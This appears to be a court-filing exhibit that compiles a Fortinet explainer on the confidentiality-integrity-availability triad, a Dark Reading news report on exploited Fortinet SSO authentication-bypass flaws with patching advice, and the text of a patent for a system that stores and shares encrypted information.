These direct attacks may use techniques such as man-in-the-middle (MITM) attacks, where an attacker positions themselves in the stream of information to intercept data and then either steal or alter it. Some attackers engage in other types of network spying to gain access to credentials. In some cases, the attacker will try to gain more system privileges to obtain the next level of clearance.

However, not all violations of confidentiality are intentional. Human error or insufficient security controls may be to blame as well. For example, someone may fail to protect their password—either to a workstation or to log in to a restricted area. Users may share their credentials with someone else, or they may allow someone to see their login while they enter it. In other situations, a user may not properly encrypt a communication, allowing an attacker to intercept their information. Also, a thief may steal hardware, whether an entire computer or a device used in the login process and use it to access confidential information.

To fight against confidentiality breaches, you can classify and label restricted data, enable access control policies, encrypt data, and use multi-factor authentication (MFA) systems. It is also advisable to ensure that all in the organization have the training and knowledge they need to recognize the dangers and avoid them.

## Cybersecurity Resources

- Cybersecurity
- Types of Cyber Attacks
- IT vs OT Cybersecurity
- AI Cybersecurity
- Cyber Threat Intelligence
- Cybersecurity Management
- Network Security
- Data Security
- Email Security
- Endpoint Security
- Web Security
- Enterprise Security
- Cybersecurity Mesh

## Quick Links

- Fortinet Products
- Fortinet Demos
- Analyst Reports
- Fortiguard Threat Intelligence
- Contact Us

REQUEST A QUOTE
FREE DEMO
CONTACT US
Need help? Chat with us!

data is authentic, accurate, and reliable.

For example, if your company provides information about senior managers on your website, this information needs to have integrity. If it is inaccurate, those visiting the website for information may feel your organization is not trustworthy. Someone with a vested interest in damaging the reputation of your organization may try to hack your website and alter the descriptions, photographs, or titles of the executives to hurt their reputation or that of the company as a whole.

Compromising integrity is often done intentionally. An attacker may bypass an intrusion detection system (IDS), change file configurations to allow unauthorized access, or alter the logs kept by the system to hide the attack. Integrity may also be violated by accident. Someone may accidentally enter the wrong code or make another kind of careless mistake. Also, if the company's security policies, protections, and procedures are inadequate, integrity can be violated without any one person in the organization accountable for the blame.

To protect the integrity of your data, you can use hashing, encryption, digital certificates, or digital signatures. For websites, you can employ trustworthy certificate authorities (CAs) that verify the authenticity of your website so visitors know they are getting the site they intended to visit.

A method for verifying integrity is non-repudiation, which refers to when something cannot be repudiated or denied. For example, if employees in your company use digital signatures when sending emails, the fact that the email came from them cannot be denied. Also, the recipient cannot deny that they received the email from the sender.

### 3. Availability

Even if data is kept confidential and its integrity maintained, it is often useless unless it is available to those in the organization and the customers they serve. This means that systems, networks, and applications must be functioning as they should and when they should. Also, individuals with access to specific information must be able to consume it when they need to, and getting to the data should not take an inordinate amount of time.

If, for example, there is a power outage and there is no disaster recovery system in place to help users regain access to critical systems, availability will be compromised. Also, a natural disaster like a flood or even a severe snowstorm may prevent users from getting to the office, which can interrupt the availability of their workstations and other devices that provide business-critical information or applications. Availability can also be compromised through deliberate acts of sabotage, such as the use of denial-of-service (DoS) attacks or ransomware.

To ensure availability, organizations can use redundant networks, servers, and applications. These can be programmed to become available when the primary system has been disrupted or broken. You can also enhance availability by staying on top of upgrades to software packages and security systems. In this way, you make it less likely for an application to malfunction or for a relatively new threat to infiltrate your system. Backups and full disaster recovery plans also help a company regain availability soon after a negative event.




Click to See Larger Image

## Should You Use the CIA Triad?

The CIA triad provides a simple yet comprehensive high-level checklist for the evaluation of your security procedures and tools. An effective system satisfies all three components: confidentiality, integrity, and availability. An information security system that is lacking in one of the three aspects of the CIA triad is insufficient.

The CIA security triad is also valuable in assessing what went wrong—and what worked—after a negative incident. For example, perhaps availability was compromised after a malware attack such as ransomware, but the systems in place were still able to maintain the confidentiality of important information. This data can be used to address weak points and replicate successful policies and implementations.

### Cybersecurity Resources

- Cybersecurity
- Types of Cyber Attacks
- IT vs OT Cybersecurity
- AI Cybersecurity
- Cyber Threat Intelligence
- Cybersecurity Management
- Network Security
- Data Security
- Email Security
- Endpoint Security
- Web Security
- Enterprise Security
- Cybersecurity Mesh

### Quick Links

- Fortinet Products
- Fortinet Demos
- Analyst Reports
- Fortiguard Threat Intelligence
- Contact Us

REQUEST A QUOTE
FREE DEMO
CONTACT US
Need help? Chat with us!

particularly helpful when developing systems around data classification and managing permissions and access privileges. You should also stringently employ the CIA triad when addressing the cyber vulnerabilities of your organization. It can be a powerful tool in disrupting the cyber kill chain, especially when combined with threat modeling, which helps security teams map out potential attack paths and assess risk across confidentiality, integrity, and availability. The CIA security triad can help you hone in on what attackers may be after and then implement policies and tools to adequately protect those assets.

In addition, the CIA triad can be used when training employees regarding cybersecurity. You can use hypothetical scenarios or real-life case studies to help employees think in terms of the maintenance of confidentiality, integrity, and availability of information and systems.

### Challenges of Adopting the CIA Triad in Cybersecurity

- **Handling massive data:** Securing vast amounts of data from numerous sources in multiple formats is challenging for organizations. Duplicate datasets and disaster recovery processes can increase costs and complicate data protection under CIA.
- **Weak data stewardship and governance:** Big data environments often lack strong auditing and visibility. This leads to poor data stewardship.
- **IoT privacy and security gaps:** IoT devices transmit fragmented data that can compromise user privacy when aggregated. These devices often go unpatched or use weak passwords. This creates new entry points for cyberattacks.
- **Security during product development:** Network-connected products should consider security from the design phase to limit attack surfaces. Failing to do so increases risks to sensitive information across interconnected systems.
- **Balancing usability and security:** Stronger security controls can reduce system availability and frustrate users, leading to workarounds. On the other hand, relaxing security for ease of use can expose systems to breaches.

## Implementing the CIA Triad: Best Practices for Cybersecurity

- **Categorize and protect sensitive data:** Classify all data and assets based on their confidentiality needs. Enforce data encryption, two-factor authentication, and maintain updated access control lists and file permissions as part of essential security hygiene.
- **Strengthen role-based privacy training:** Conduct regular privacy awareness training for employees. Tailor sessions to both organization-wide privacy standards and role-specific data management requirements.
- **Implement data integrity controls:** Use version control, data logs, checksums, and hash functions to monitor and preserve data accuracy during processing, transfer, and storage. Apply granular access control to prevent unauthorized data modifications.
- **Adhere to the compliance standards:** Review regulatory obligations. For instance, under the general data protection regulation (GDPR), ensure that data transfers to third-party vendors meet "adequate levels of protection" and are supported by "legal safeguards."
- **Ensure continuous availability and recovery:** Design systems with redundancy and failover mechanisms to reduce downtime. Use network/server monitoring tools and maintain cloud-based backup. This can help ensure quick and complete data recovery and business continuity in case of a security breach.

### Enhance Protection with the CIA Triad Principles

Applying the CIA triad can help strengthen an organization's overall security strategy. It protects sensitive data from exposure, ensures information isn't tampered with, and keeps systems available when users need them. Together, these three pillars reduce risk, support compliance, and build a robust IT environment.

Organizations should begin by classifying sensitive data and enforcing encryption and access controls to protect confidentiality. Moreover, using the right tools can help maintain data integrity and prevent tampering. Fortinet's next-generation firewall supports these principles with built-in threat protection, visibility, and uptime. This makes it easier to secure modern, distributed networks.

As the need for safeguarding confidentiality, integrity, and availability grows, traditional firewalls may no longer be sufficient to address the complex security demands. Enhance protection with FortiGate Firewall.

## CIA Triad and Cybersecurity FAQs

What does CIA stand for in cybersecurity?

What is integrity in the CIA triad?

How do you ensure the protection of the CIA triad?

Who created the CIA triad?

How do fake social media accounts breach the CIA security triad?

### Cybersecurity Resources

- Cybersecurity
- Types of Cyber Attacks
- IT vs OT Cybersecurity
- AI Cybersecurity
- Cyber Threat Intelligence
- Cybersecurity Management
- Network Security
- Data Security
- Email Security
- Endpoint Security
- Web Security
- Enterprise Security
- Cybersecurity Mesh

### Quick Links

- Fortinet Products
- Fortinet Demos
- Analyst Reports
- Fortiguard Threat Intelligence
- Contact Us

REQUEST A QUOTE
FREE DEMO
CONTACT US
Need help? Chat with us!

## Cybersecurity Resources

- Cybersecurity
- Types of Cyber Attacks
- IT vs OT Cybersecurity
- AI Cybersecurity
- Cyber Threat Intelligence
- Cybersecurity Management
- Network Security
- Data Security
- Email Security
- Endpoint Security
- Web Security
- Enterprise Security
- Cybersecurity Mesh

## Quick Links

- Fortinet Products
- Fortinet Demos
- Analyst Reports
- Fortiguard Threat Intelligence
- Contact Us

## Speak with an Expert

Please fill out the form and a knowledgeable representative will get in touch with you soon.

First Name *
Last Name *
Job Function *
Job Level *
Company *
Email Address *
Phone: (201) 555-0123 *
Country/Region *
Any specific product, services or solution? (Optional)

I consent to receive promotional communications (which may include phone, email, and social) from Fortinet. I understand I may proactively opt out of communications with Fortinet at anytime.

By clicking submit you agree to the Fortinet Terms and Conditions & Privacy Policy.

SUBMIT

REQUEST A QUOTE
FREE DEMO
CONTACT US



Copyright © 2026 Fortinet, Inc. All Rights Reserved.

# APPENDIX N

DARKREADING

LevelBlue
Secure What's Next.
The world's largest pure-play MSSP.
Meet LevelBlue

CYBERATTACKS & DATA BREACHES | PERIMETER | VULNERABILITIES & THREATS | NEWS

# Critical Fortinet Flaws Under Active Attack

Attackers are targeting admin accounts, and once authenticated, exporting device configurations including hashed credentials and other sensitive information.

Jai Vijayan, Contributing Writer
December 17, 2025

4 Min Read

LevelBlue
Secure What's Next.




SOURCE: T. SCHNEIDER VIA SHUTTERSTOCK

The US Cybersecurity and Infrastructure Security Agency (CISA) has added a recently disclosed security flaw affecting multiple Fortinet network security and management platforms to its known exploited vulnerabilities (KEV) catalog, citing evidence of active exploitation.

The vulnerability tracked as CVE-2025-59718 (CVSS Score: 9.1) is one of two critical authentication bypass flaws — the other is CVE-2025-59719 (CVSS Score: 9.1)— that Fortinet disclosed on Dec. 9 in its FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager products.

## Authentication Bypass

Both vulnerabilities allow an unauthenticated attacker to bypass SSO login authentication using specially crafted SAML messages, when the FortiCloud SSO feature is enabled. The vulnerabilities have to do with improper verification of cryptographic signatures and give threat actors a way to assume admin control of affected devices without valid controls.

Such vulnerabilities are a frequent target for attackers because successful exploitation can give threat actors control over an organization's entire network perimeter and traffic flow. They pose "significant risks to federal enterprises" CISA said in its notification about adding CVE-2025-59718 to its KEV. Federal civilian executive branch agencies must patch the flaw by Dec. 23 or discontinue use of affected Fortinet products till they have remediated the issue per the vendor's guidance.

DR POLL

Which of these predictions is MOST likely to happen in 2026?

Choose the best option 152.3K

A Agentic AI & autonomous systems become primary cyber targets

B Deepfakes become top social engineering vector for big targets

C Boards recognize cyber-risk as a Tier 1 operational priority

**Related:** WorldLeaks Extortion Group Claims It Stole 1.4TB of Nike Data

According to Arctic Wolf, attack activity targeting both vulnerabilities appear to have started as early as Dec. 12 a mere three days after Fortinet disclosed them. Researchers at the security vendor observed intrusions involving malicious SSO logins on FortiGate devices originating from a small number of hosting providers with IP addresses geolocated in Germany, the US and Asia.

The malicious logins primarily targeted admin accounts. Following successful authentication bypass, the attackers exported device configurations including hashed credentials and other sensitive information, to the same IP addresses used for the initial intrusion, according to Arctic Wolf.

DARKREADING

Ask Dark Reading: Search our expert coverage for answers

lities (KEV) catalog, and what risks are associated with delayed remediation? What best prc

In its advisory, Fortinet described FortiCloud SSO as disabled by default in factory settings. However, the feature automatically activates when administrators register devices through the graphical user interface using FortiCare. "Unless the administrator disables the toggle switch "Allow administrative login using FortiCloud SSO" in the registration page, FortiCloud SSO login is enabled upon registration," Fortinet said.

**Related:** DPRK's Konni Targets Blockchain Developers With AI-Generated Backdoor

This design choice may have left more devices vulnerable than organizations using them might have realized. "Threat actors commonly target management interfaces of firewalls and VPNs for mass exploitation, often relying on specialized search engines that facilitate identification of specific hardware configurations," Arctic Wolf researchers noted in their analysis.

## Need for Speed

Fortinet has released fixes across multiple product lines. For FortiOS, patches are available in versions 7.6.4, 7.4.9, 7.2.12, and 7.0.18 or higher. Similar patches are available for FortiProxy, FortiSwitchManager, and FortiWeb. Notably, FortiOS 6.4, FortiWeb 7.0, and FortiWeb 7.2 are unaffected by the vulnerabilities.

Organizations unable to immediately patch can implement a temporary workaround by disabling the FortiCloud login feature through system settings or the command-line interface, Fortinet said. The company has recommended that affected organizations take this step until they are able to upgrade to non-affected versions.

"Patching Fortinet devices requires maintenance windows to avoid production outages, but the immediate risk isn't patching speed, it's the exposure of Internet-facing management interfaces," says Piyush Sharma, CEO and co-founder of Tuskira in comments to Dark Reading. Organizations can implement immediate workarounds by disabling http/https admin access or restricting it to trusted IPs while patches are tested, he says. Long-term defense requires continuous validation via real-time monitoring for indicators of compromise (IoCs) like unauthorized admin accounts, suspicious jsconsole sessions, and unexpected SSL VPN authentication, Sharma says.

**Related:** 'CrashFix' Scam Crashes Browsers, Delivers Malware

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 267 of 433 PageID #: 7577

Arctic Wolf wants affected organizations to assume their credentials are compromised if they observe suspicious activity matching patterns associated with attacks on the vulnerabilities. The vendor recommends that such organizations immediately reset firewall credentials and upgrade to patched versions of affected products as soon as possible. "Although credentials are typically hashed in network appliance configurations, threat actors are known to crack hashes offline, especially if credentials are weak and susceptible to dictionary attacks," the security vendor reminded.

"Fortinet devices are high-value targets because they control firewall policies, VPN access, and traffic routing at the network perimeter," Sharma says, advising organizations to patch promptly. A single compromise can enable attackers to create rogue accounts, modify security policies, and establish SSL VPN tunnels for lateral movement, he adds. "In the current campaign, attackers are stealing configuration files containing network topology and credentials to support future attacks, requiring zero authentication if management interfaces are exposed."

## About the Author



**Jai Vijayan, Contributing Writer**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variet...

## You May Also Like




**Ghost Ransomware Targets Orgs in 70+ Countries**

by Elizabeth Montalbano, Contributing Writer

FEB 20, 2025




**Microsoft 365 Accounts Get Sprayed by Mega-Botnet**

by Kristina Beek, Associate Editor, Dark Reading

FEB 25, 2025




**North Korea's Lazarus Pulls Off Biggest Crypto Heist in History**

by Elizabeth Montalbano, Contributing Writer

FEB 25, 2025




**DeepSeek Breach Opens Floodgates to Dark Web**

by Emma Zaballos

APR 22, 2025

# APPENDIX O

US009390228B2

(12) **United States Patent**
**Reid**

(10) **Patent No.: US 9,390,228 B2**
(45) **Date of Patent: Jul. 12, 2016**

(54) **SYSTEM AND METHOD FOR SECURELY STORING AND SHARING INFORMATION**

(71) Applicant: **REID CONSULTING GROUP**, Athens, OH (US)

(72) Inventor: **Thomas Alan Reid**, Athens, OH (US)

(73) Assignee: **Reid Consulting Group, Inc.**, Athens, OH (US)

( * ) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 14 days.

(21) Appl. No.: **14/539,614**

(22) Filed: **Nov. 12, 2014**

(65) **Prior Publication Data**

US 2015/0074409 A1 Mar. 12, 2015

**Related U.S. Application Data**

(63) Continuation-in-part of application No. 13/665,861, filed on Oct. 31, 2012.

(60) Provisional application No. 61/553,883, filed on Oct. 31, 2011.

(51) **Int. Cl.**

***H04L 29/06*** (2006.01)
***G06F 19/00*** (2011.01)
***G06F 21/62*** (2013.01)

(52) **U.S. Cl.**

CPC .......... ***G06F 19/322*** (2013.01); ***G06F 21/6218*** (2013.01); ***H04L 63/0428*** (2013.01); ***H04L 63/0435*** (2013.01); ***H04L 63/061*** (2013.01)

(58) **Field of Classification Search**

CPC ... G06F 19/322; G06F 19/324; G06F 19/327; G06F 21/6218; G06F 21/60; G06F 17/30233; H04L 63/0815; H04L 63/0435

See application file for complete search history.

(56) **References Cited**

U.S. PATENT DOCUMENTS

| | | | |
|---|---|---|---|
| 2008/0104705 | A1 | 5/2008 | Hasbun |
| 2009/0228950 | A1 | 9/2009 | Reed et al. |
| 2010/0122120 | A1 | 5/2010 | Lin |
| 2011/0055202 | A1 | 3/2011 | Heimendinger |

(Continued)

OTHER PUBLICATIONS

International Search Report and Written Opinion dated Feb. 2, 2016; International Application No. PCT/US2015/059717; International File Date Nov. 9, 2015.

*Primary Examiner* — Yin-Chen Shaw
*Assistant Examiner* — Arya Golriz
(74) *Attorney, Agent, or Firm* — Vorys, Sater, Seymour and Pease LLP

(57) **ABSTRACT**

A method for any community of interest to conduct secure exchange of encrypted data using a three-party security mechanism consisting of key masters, registries and cloud lockboxes. The registries establish unique identities, verify authenticity, and create directories of individuals, members, cloud lockboxes and other registries. The registries manage permissions lists communicated to the cloud lockboxes as well as detecting and halting anomalous activity. The key masters operated by members to manage keys for individuals, handle encryption and decryption and conduct key exchanges with other members. The cloud lockboxes manage file storage, retrieval and access control. Related application programming interfaces support multiple levels of integration and generate metadata specific to the needs of the community of interest. Community of interest establishes operating parameters including: selecting an encryption algorithm, establishing identity verification processes and selecting a security level. The design supports several other key features.

**32 Claims, 18 Drawing Sheets**



(56) **References Cited**

U.S. PATENT DOCUMENTS

2011/0066863 A1 3/2011 Katzenbeisser et al.
2012/0257759 A1 10/2012 Nick et al.
2013/0275470 A1 10/2013 Cao et al.
2013/0297662 A1* 11/2013 Sharma ............... H04L 63/0815 707/827
2014/0046708 A1 2/2014 Werner
2014/0068202 A1 3/2014 Goddard
2014/0082749 A1* 3/2014 Holland ................ G06F 21/645 726/29
2014/0129047 A1* 5/2014 Barrett ..................... G07C 5/00 701/1
2014/0245012 A1 8/2014 Arya et al.

* cited by examiner


Patient's "Medical Home" Health Care Provider
101
Longitudinal De-Identified Research Data
118
10
HCP #1 Electronic Health Record Software (EHR)
110
UHE API
261
Patient Portal
114
4
Patient
116
Key Master
112
100
1
3
5
HIE Registry
120
2
Cloud Lockbox
130
6
7
8
9
KM
112
U-API
261
Other HCP's EHR
143
Other HCPs
141
Pharmacy Software
145
Pharmacies
144
Write-Only Software (e.g. Labs, Mobile Health, etc.)
147
Write Only Members
146
Limited Access Software (e.g. Payers)
149
Metadata Only Members
148
KM = Key Master
U-API = UHE API

Figure 1




**Figure 2: UHE in Action**




Figure 3: HCP Registration




Figure 4: Registration of a Patient




Figure 5: Activity Logs




KM = Key Master
U-API = UHE API

**Figure 6: Write Only Members**




Figure 7: "Glass Break" Scenario




Figure 8 : Waste Fraud and Abuse Prevention




Figure 9: Support for Medical Research




Figure 10: Key Change and/or Revoking Access




KM = Key Master
U-API = UHE API

**Figure 11: Key Recovery Processes**




Figure 12: Multiple Software EHRs to a Single Key Master




**Figure 13: Registry-to-Registry Communications**




Figure 14A




Figure 14B




KM = Key Master
U-API = UHE API

**Figure 15: Health Record Representative Model**




**Figure 16: Legal Industry Model**




Figure 17: Real Estate Industry Model




Figure 18: Information Owner Hosted and Multiple Encryption Algorithms

# SYSTEM AND METHOD FOR SECURELY STORING AND SHARING INFORMATION

## CROSS-REFERENCE TO RELATED APPLICATIONS

This application is a continuation-in-part of U.S. application Ser. No. 13/665,861 filed on Oct. 31, 2012, which claims priority to U.S. Provisional Patent Application Ser. No. 61/553,883 entitled "System and Method for Securely Storing and Sharing Information" filed Oct. 31, 2011, both of which are incorporated by reference in its entirety as if fully set forth herein.

## TECHNICAL FIELD

The present application generally relates to systems, devices, and methods to conduct the secure exchange of encrypted data using a three-party security mechanism consisting of the members, the registries, and the cloud lockboxes. Control of the private key required for decryption is maintained by the information owner. More specifically, the mechanism establishes unique identities, verifies authenticity, generates and securely exchanges encryption key pairs, encrypts, transmits, receives and decrypts data to/from cloud lockboxes; creates and appends metadata specific to the applications and retrieves and/or acts upon metadata. The related application programming interfaces support multiple levels of integration and generate metadata specific to the needs of the application. A community of interest establishes operating parameters including: selecting an encryption algorithm, establishing identity verification processes, and selecting a security level. The design supports several other key features using operating protocols and/or metadata.

## BACKGROUND

Certain methods and systems have previously been used for securely storing and sharing confidential information. Some such systems employ cryptography, such as public/private key encryption, to protect information and/or identity management.

Cryptography can provide strong protection, but the key exchange process makes sharing encrypted data clumsy and sometimes insecure. Weak, absent, or disconnected identity verification also degrades the effectiveness.

Accordingly, there is a need for systems, methods, and devices that enable secure exchange of encryption keys among any community of interest. Specifically, a need exists for a system for securely storing and sharing information which manages encryption keys separately from the encrypted information to limit access to underlying information only to those who are authorized and that integrated identity management and verification as part of the process.

## SUMMARY

According to a first aspect of the present application, a method to conduct secure exchange of encrypted data using a three-party security mechanism consisting of the key masters operated by the members of the community of interest, the registries, and the cloud lockboxes. The registries establish unique identities, verify authenticity, and create directories of individuals, members, organizations, key masters, cloud lockboxes and other registries. The registries manage permissions lists communicated to the cloud lockboxes, as well as detecting and halting anomalous activity. The members operate key master software, preferably provisioned as an appliance, to create and manage keys for individuals, handle encryption, and decryption and conduct key exchanges with other members. The cloud lockboxes manage file storage, retrieval, and access control. The related application programming interfaces support with multiple levels of integration and generate metadata specific to the needs of the application. A community of interest establishes operating parameters including: selecting an encryption algorithm, establishing identity verification processes, and selecting a security level.



According to the second aspect of the present application, a method for creating a community of interest is disclosed. Any community of interest can establish its own operating parameters including: selecting a public key encryption algorithm, selecting a registry or registries, establishing related membership requirements and identity verification processes, selecting a cloud storage provider or providers, selecting the optional security features, and determining the minimum application integration levels.

According to the third aspect of the present application, a method for creating features through protocols operating among the parties and metadata is disclosed. The protocols and metadata enable features including: detection and halting of anomalous access, time-to-live settings on the sharing of data; key change and access revocation processes; key and file recovery processes, de-identification of data to feed research databases, and emergency access protocols. The design supports addition of features by leveraging existing design elements and expanding operating protocols and metadata.

According to the fourth aspect of the present application, a method for minimizing the exposure of data to system administrators is disclosed. The protected data is encrypted prior to reaching the cloud lockbox, the cloud lockbox never has the decryption key, thus the system administrator performing duties for performance optimization and maintenance of the cloud lockboxes has access to the encrypted data but does not have the decryption key. Further, when application owners elect to integrate the present application into their native data storage solutions, the benefits of this aspect extend into the premises-based or cloud-based storage of the application itself.

According to the fifth aspect of the present application, a method for integrating with applications and creation of hybrid cloud and on-premises data storage solutions is disclosed. The invention provides robust approaches for the integration of an application into the community of interest by providing both published and unpublished application programming interfaces supporting multiple levels of application integration ranging from native integration to the use of industry-standard interfaces to simple archiving solutions. The method facilitates the creation of hybrid cloud and on-premises storage solutions with predictive caching; and provides a method to integrate disparate applications within a single enterprise or across multiple enterprises.

According to the sixth aspect of the present application, a method for offering a variety of security levels is disclosed. The invention can be deployed in various ways to achieve the security level desired by the community of interest ranging from:

a. the stringent Federal Information Processing Standards 140-2 Level 4;

b. rigorous civilian standards for protecting confidentiality such as Health Information

Portability and Accountability Act;

c. relatively low level security required for non-sensitive information.

The design traverses these various security levels based on:

d. Deploying the key master as an appliance thus keeping critical processes such as key management, encryption and decryption within a hardened environment rather than running this software on a general purpose computer;

e. Depth of integration with the applications;

f. Optional registered IP address restrictions.

## BRIEF DESCRIPTION OF THE DRAWINGS

The accompanying figures, which are incorporated in and constitute a part of the specification, illustrate various example systems, devices methods, and so on, and are used merely to illustrate various example embodiments. It should be noted that various components depicted in the figures may not be drawn to scale, and that the various assemblies and designs depicted in the figures are presented for purposes of illustration only and should not be considered in any way as limiting.

FIG. **1** is a schematic block diagram illustrating an example environment for the systems, devices and methods of the present application.

FIG. **2** is a schematic block diagram further illustrating operation of the UHE of FIG. **1**.

FIG. **3** is a schematic block diagram illustrating an HCP registration process using the UHE of FIG. **1**.

FIG. **4** is a schematic block diagram illustrating a patient registration process using the UHE of FIG. **1**.

FIG. **5** is a schematic block diagram illustrating the use of activity logs using the UHE of FIG. **1**.

FIG. **6** is a schematic block diagram illustrating sharing write-only data using the UHE of FIG. **1**.

FIG. **7** is a schematic block diagram illustrating communications in an emergency situation using the UHE of FIG. **1**.

FIG. **8** is a schematic block diagram illustrating mechanisms for identifying fraud, waste and abuse using the UHE of FIG. **1**.

FIG. **9** is a schematic block diagram illustrating the generation of de-identified patient data using the UHE of FIG. **1**.

FIG. **10** is a schematic block diagram illustrating the key change and/or revocation of access using the UHE of FIG. **1**.

FIG. **11** is a schematic block diagram illustrating the key recovery process using the UHE of FIG. **1**.

FIG. **12** is a schematic block diagram illustrating the ability to support multiple participant software modules using the UHE of FIG. **1**.

FIG. **13** is a schematic block diagram illustrating other alternate environments for the systems, devices, and methods of the present application.

FIGS. **14**A and **14**B are a schematic block diagrams illustrating other alternate environments for the systems, devices, and methods of the present application.

FIG. **15** is a schematic block diagram illustrating other alternate environments for the systems, devices, and methods of the present application.

FIG. **16** is a schematic block diagram illustrating an alternate environment for the systems, devices, and methods of the present application for use in the legal industry.

FIG. **17** is a schematic block diagram illustrating an alternate environment for the systems, devices, and methods of the present application for use in the real estate industry.

FIG. **18** is a schematic block diagram illustrating an alternate environment for the systems, devices, and methods of the present application for use in the real estate industry.

## DRAWING REFERENCE NUMERALS

The following reference characters identify the associated elements depicted in the drawings describing the present invention.

| | |
|---|---|
| 100 | Exemplary environment |
| 101 | Medical Home HCP |
| 110 | HCP #1 Electronic Health Record Software |
| 111 | Activity Log UHE API |
| 112 | Key Master (KM) |
| 114 | Patient Portal |
| 116 | Patient |
| 118 | Longitudinal De-Identified Research Data |
| 120 | HIE Registry |
| 130 | Cloud Lockbox |
| 140 | Secondary HCP |
| 141 | Other HCPs |
| 142 | HCP #2 EHR |
| 143 | Other HCP's EHR |
| 144 | Pharmacies |
| 145 | Pharmacy Software |
| 146 | Write-Only-Members |
| 147 | Write-Only Software (e.g. Labs, Mobile Health, etc.) |
| 146A | Mobile Health Monitor Software |
| 146B | Lab Software |
| 146C | Other Write-Only Software |
| 148 | Metadata-Only Members |
| 149 | Metadata-Only Software (e.g. Payers) |
| 150 | Payer |
| 151 | Payer's Software |
| 152 | HCP #3 EHR |
| 210 | Encrypted EHR Files |
| 210-A | Encrypted HCP #2 Files |
| 211 | File Handler |
| 212 | Permissions Directory |
| 214 | Receptors |
| 216 | Activity Log Cloud Lockbox |
| 250 | Native EHR Files |
| 260 | API Engine |
| 261 | Unified Health Exchange (UHE) Application Programming Interface (UHE-API) (U-API) |
| 262 | Key Manager and File Broker |
| 264 | Activity Log File Broker |
| 281 | HCP Directory |
| 282 | Patient Directory and Permissions |
| 283 | Cloud Lockbox Directory |
| 284 | Registry Directory |
| 310 | Government and Industry DBs |
| 412 | Information Owner Key Master |
| 420-A | HIE Registry - Health Care Community-of-Interest |
| 420-B | Legal Exchange Registry - Legal Community-of-Interest |
| 430-A | Cloud Lockbox for Health Care Community-of-Interest |
| 430-B | Cloud Lockbox for Legal Community-of-Interest |
| 460 | API Engine |
| 461 | Application Programming Interface |
| 462-A | Key Manager and File Broker-A |
| 462-B | Key Manager and File Broker-B |
| 610 | Emergency Room HCP |
| 612 | Emergency Room HCP EHR |
| 910A-910E | HCPs |
| 920A-920C | HIE Registries |
| 1010 | HCP #1 |
| 1011 | HCP #2 |
| 1048 | Write-Only Member(s) |
| 1030A | Cloud Lockbox #1 |
| 1030B | Cloud Lockbox #2 |

## DETAILED DESCRIPTION

This present application describes systems, devices, and methods for providing secure exchange of encrypted data using a three-party security mechanism consisting of the key masters operated by the members, the registries, and the cloud lockboxes plus the application programming interfaces.

A member may be an individual directly participating in a community of interest, an organization participating in a

community of interest for its own purposes, or an organization participating in a community of interest to represent multiple individuals in which case the individual is participating by proxy.

The members use a key master software (preferably provisioned as an appliance) to:

- Verify the identity and authority of the member in communications with the registry;
- Establish a unique identity and verify authenticity for each individual and organization in communications with the registry;
- Generate individual public-private key pairs for each individual being represented by the member and for the organization itself (if applicable);
- Receive an individual's data and related metadata from the application programming interface;
- Encrypt the data and related metadata with the individual's public key;
- In some uses, encrypt some or all of the metadata with public key of metadata-only recipient;
- Create non-sensitive transactional metadata and append to the files;
- Transmit the encrypted data, metadata, and transactional metadata to cloud lockbox;
- Control of the individual's private key (required for decryption) retained by the member's key master;
- Retrieve files from cloud lockbox and decrypt with an individual's private key;
- With authorization by the individual:
  - Securely transmit an individual's private key to another member's key master to permit decryption of the individual's files;
  - Update permissions lists at registries;
- Transmit activity records of key creation, file retrieval requests, private key exchanges and other activities to the registries;

The registries:

- Establish identity and verify authenticity of members, organizations, other registries and cloud lockboxes;
- Establish unique identities for each individual represented in a community of interest in communications with the key masters, a process which may include communications with additional registries if more than one registry is operational for the community of interest;
- Maintain directories of individuals, members, organizations, and cloud lockboxes and other registries;
- Function as a clearinghouse for members to retrieve public keys of other members, organizations, and cloud lockboxes;
- Manage individual-level access control lists and communicate lists to cloud lockboxes for controlling access to data files;
- Receive activity records from the key masters, the cloud lockboxes, and the application programming interfaces;
  - Analyze activity logs to detect and halt anomalous access;
  - Provide the members with alerts regarding anomalous access and with routine access to activity logs;

The cloud lockboxes:

- Store encrypted data, metadata, and appended transactional metadata;
- Create receptors for stored data to serve as claim tickets for the members;



- Utilize access control lists received from registries to determine which individuals' files a given member may store and retrieve;
- Transmit activity records of file retrieval requests to the registries.

The related application programming interfaces offer flexibility in adapting to the needs of the specific community of interest and/or of the application owner. The application programming interfaces:

- Consist of both publically published and private proprietary methods to integrate to the applications being used by members of a community of interest;
- Support multiple levels of application integration ranging from native integration, in which this mechanism's encryption and protocols are extended into the data stores of the application, to the use of industry-standard interfaces, and to simple archiving solutions and many gradations in between;
- Convert data to/from proprietary to industry standard formats;
- Convert data between key-value data stores to/from relational databases;
- Generate metadata specific to the application that can either be:
  - Appended to the data and encrypted;
  - Encrypted separately from the data so a member could be granted metadata only access;
  - Left unencrypted and added to the transactional metadata created by key master;
- Map individuals' identification numbers in applications to community of interest identification numbers for the same individuals;
- Enable the creation of hybrid cloud and on-premises storage solutions;
- Transmit log records of file retrieval requests, access revocations and other activities to the registries.

Digital signatures verify the identity of members, registries, and cloud lockboxes for all communications and protocols. Encryption protects all sensitive data both in motion and at rest. Optional IP address restrictions add another level to the security model. Appliance-based option for the encryption, decryption and key management further bolsters security.

Any community of interest can establish its own operating parameters including:

- Selecting a public key encryption algorithm;
- Selecting a registry or registries;
- Establishing related membership requirements and identity verification thresholds;
- Selecting a cloud storage provider or providers at which to establish Cloud Lockboxes;
- Selecting from among the optional security measures;
- Determining the minimum application integration levels.

The method also provides protocols and metadata to enable features such as:

- Time-to-live settings to limit the duration of a member's access to the data of an individual's data;
- Key change and file access revocation processes;
- Key and file recovery processes;
- Ability to de-identify the individual's files to facilitate academic or business research.
- Emergency access.
- The design supports addition of features by leveraging existing design elements and expanding operating protocols and related metadata.

The method minimizes the exposure of data to system administrators because:

The protected data is encrypted prior to reaching the cloud lockbox;

The cloud lockbox never has the decryption key;

The system administrators performing duties for performance optimization and maintenance of the cloud lockboxes and any applications integrating the mechanism have access to the encrypted data but does not have the decryption keys.

